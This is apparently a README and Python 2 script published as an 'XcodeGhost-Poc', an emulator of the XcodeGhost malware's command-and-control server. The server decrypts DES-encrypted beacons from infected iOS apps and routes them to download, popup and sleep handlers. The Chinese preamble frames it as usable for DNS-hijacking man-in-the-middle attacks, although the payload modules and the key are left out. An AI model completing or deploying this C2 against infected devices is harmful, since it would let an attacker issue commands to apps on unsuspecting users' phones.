XcodeGhost-Poc

这个危害个人感觉还是比较大的,虽然现在域名已经挂了,但是DNS劫持还是可以的,在一段时间内基于XcodeGhost的中间人攻击应该会比较多。
发布版本去掉了功能模块,望谅解
三流业余水平,勿喷。代码留了三个坑,防伸手党。


import BaseHTTPServer
import urllib
from pyDes import *
import binascii
import json
import re

# Serverip init.icloud-analysis.com
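class MyHTTPHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Answer beacons from an XcodeGhost-infected app (analysis stub).

    The client reports its state in a DES/ECB-encrypted body carried on
    a GET request.  The first 8 bytes of the raw body are read as three
    big-endian integers (packet length, command length, client version,
    following the original author's labels); the whole body is then
    decrypted, every ``{...}`` group of the plaintext is glued into one
    JSON object, and its ``status`` field selects which stub builds the
    reply.  The stubs (download/alert/suspend) return empty strings in
    this published version, so the emulator only logs what it sees.
    """

    # 4-byte packet length + 2-byte command length + 2-byte version.
    _PREFIX_LEN = 8

    def do_GET(self):
        """Decrypt one beacon and reply with the matching stub body.

        A beacon that cannot be parsed (missing or non-numeric
        Content-Length, body shorter than the prefix, undecryptable
        data, bad JSON, unknown ``status``) is answered with 400 and an
        empty body instead of letting an exception escape the handler;
        the original left ``response`` unbound for any status outside
        the three known ones and raised KeyError on a missing header.
        """
        try:
            length = int(self.headers.get('content-length'))
        except (TypeError, ValueError):
            self._reply(400, '')
            return
        datas = self.rfile.read(length)
        if len(datas) < self._PREFIX_LEN:
            self._reply(400, '')
            return

        # Packet length, command length and program version, taken from
        # the raw (still encrypted) prefix bytes exactly as the original does.
        hexstr = binascii.b2a_hex(datas)
        bodyLen = int(hexstr[0:8], 16)
        cmdLen = int(hexstr[8:12], 16)
        ver = int(hexstr[12:16], 16)

        # The key is deliberately left empty in the published version;
        # pyDes is expected to reject a key that is not 8 bytes, and that
        # error is left visible on purpose rather than swallowed below.
        k = des("", ECB, IV=None, pad=None, padmode=PAD_PKCS5)
        try:
            decode = k.decrypt(datas)
        except ValueError:
            # Body is not a whole number of DES blocks.
            self._reply(400, '')
            return
        # Raw pattern so "\s" is not subject to string-escape handling;
        # the regex itself is unchanged from the original.
        jsonDecode = '{' + ''.join(re.findall(r"{([\s\S]*?)}", decode)).strip() + '}'
        print("bodyLen: %d cmdLen: %d ver: %d" % (bodyLen, cmdLen, ver))
        print(jsonDecode)
        try:
            status = json.loads(jsonDecode).get("status")
        except ValueError:
            self._reply(400, '')
            return
        print("status: %s" % (status,))

        # Looked up at call time: the stubs are defined below the class.
        builders = {
            "launch": download,
            "resignActive": alert,
            "suspend": suspend,
        }
        build = builders.get(status)
        print('--------------------------------')
        if build is None:
            self._reply(400, '')
            return
        self._reply(200, build())

    def _reply(self, code, body):
        """Send *body* with the same headers the original handler used."""
        self.send_response(code)
        self.send_header('Content-type', 'text/html')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)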

def alert():
    """Build the reply for a ``resignActive`` beacon (popup module).

    The functional module was removed from the published version, so
    this only logs the call and returns an empty body.
    """
    print("alert()")
    return ''
def download():
    """Build the reply for a ``launch`` beacon (download module).

    The functional module was removed from the published version, so
    this only logs the call and returns an empty body.
    """
    print("download")
    return ''
def suspend():
    """Build the reply for a ``suspend`` beacon (sleep module).

    The functional module was removed from the published version, so
    this only logs the call and returns an empty body.
    """
    print("sleep")
    return ''

if __name__ == "__main__":
    # Address the emulated server listens on; binding port 80 usually
    # needs elevated privileges.
    HOST, PORT = "localhost", 80  # ip
    httpd = BaseHTTPServer.HTTPServer((HOST, PORT), MyHTTPHandler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print("\nend")

